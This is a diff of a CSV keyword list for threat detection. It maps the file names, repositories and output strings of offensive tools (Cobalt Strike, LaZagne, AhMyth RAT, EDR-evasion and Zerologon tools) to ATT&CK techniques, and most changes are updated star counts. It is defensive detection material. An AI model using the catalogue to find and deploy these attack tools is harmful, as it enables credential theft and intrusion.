 "*ADZero.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Privia-Security/ADZero","1","1","N/A","N/A","1","20","6","2020-10-02T13:00:21Z","2020-09-29T20:43:06Z"
-"*aem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*AES_cryptor.py *","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
-"*AesEncryptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*aem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*AES_cryptor.py *","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*AesEncryptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
 "*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z"
 "*ag_load_script*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
 "*agent*DNSCommunication.cpp*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
@@ -7136,20 +7280,20 @@
 "*Aggressor-Scripts*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
 "*ahmedkhlief/Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
 "*ahmedkhlief/Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
-"*AhMyth-Android-RAT*","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","10","3977","1663","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z"
+"*AhMyth-Android-RAT*","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","10","3978","1661","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z"
 "*ahsten.run \*powershell.exe*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*Airbash*","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/tehw0lf/airbash","1","0","N/A","N/A","4","340","64","2021-10-26T09:47:34Z","2018-04-18T23:50:15Z"
-"*Aircrack-ng*","offensive_tool_keyword","aircrack-ng","WiFi security auditing tools suite.","T1110 - T1170 - T1180 - T1201 - T1213","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","10","4234","838","2023-09-30T22:40:36Z","2018-03-10T17:11:11Z"
+"*Aircrack-ng*","offensive_tool_keyword","aircrack-ng","WiFi security auditing tools suite.","T1110 - T1170 - T1180 - T1201 - T1213","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","10","4238","838","2023-09-30T22:40:36Z","2018-03-10T17:11:11Z"
 "*aircrack-ng*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z"
 "*aireplay-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*aireplay-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*Airgeddon*","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1590 - T1533 - T1170 - T1583.001","TA0002 - TA0003 - ","N/A","N/A","Network Exploitation tools","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","N/A","N/A","10","5428","1104","2023-10-02T21:32:56Z","2016-03-18T10:34:56Z"
+"*Airgeddon*","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1590 - T1533 - T1170 - T1583.001","TA0002 - TA0003 - ","N/A","N/A","Network Exploitation tools","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","N/A","N/A","10","5430","1104","2023-10-02T21:32:56Z","2016-03-18T10:34:56Z"
 "*airman604/splunk_whisperer*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
 "*airmon-ng*","offensive_tool_keyword","airmon-ng","This script can be used to enable monitor mode on wireless interfaces. It may also be used to kill network managers or go back from monitor mode to managed mode","T1018 - T1040","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.aircrack-ng.org/doku.php?id=airmon-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*airodump-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*airpwn-ng*","offensive_tool_keyword","airpwn-ng","We force the targets browser to do what we want","T1562 - T1564 - T1565 - T1566 - T1567 - T1573","TA0005 - TA0007 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/ICSec/airpwn-ng","1","1","N/A","N/A","1","23","11","2022-11-07T02:22:34Z","2021-07-20T03:43:13Z"
-"*aix2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*aix2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*aix2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*aix2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*ajpc500/BOFs*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
 "*AlanFramework.git*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
 "*Alcatraz.sln*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z"
@@ -7158,16 +7302,16 @@
 "*Alcatraz-master.zip*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z"
 "*AlessandroZ/BeRoot*","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1548 - T1574","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z"
 "*AlessandroZ/BeRoot*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z"
-"*AlessandroZ/LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*AlessandroZ/LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
 "*alexa-top-20000-sites.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
 "*al-khaser*","offensive_tool_keyword","al-khaser","al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar","T1055 - T1117 - T1218 - T1003 - T1552","TA0002 - TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy/al-khaser","1","0","N/A","N/A","10","5073","1120","2023-09-29T17:54:38Z","2015-11-12T18:35:16Z"
-"*All EDR drivers were successfully removed from Kernel callbacks!*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
-"*All_SubdomainTOP_Seclist.txt*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z"
-"*AllowDelegationUsers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
-"*AllowDelegationUsers_samaccountnames_only.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*All EDR drivers were successfully removed from Kernel callbacks!*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*All_SubdomainTOP_Seclist.txt*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z"
+"*AllowDelegationUsers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*AllowDelegationUsers_samaccountnames_only.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*almandin/krbjack*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
-"*ALPC-TaskSched-LPE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*ALPC-TaskSched-LPE.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*ALPC-TaskSched-LPE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ALPC-TaskSched-LPE.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*Alphabug_CS*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
 "*Alphabug_CS*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
 "*AlphabugX/csOnvps*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 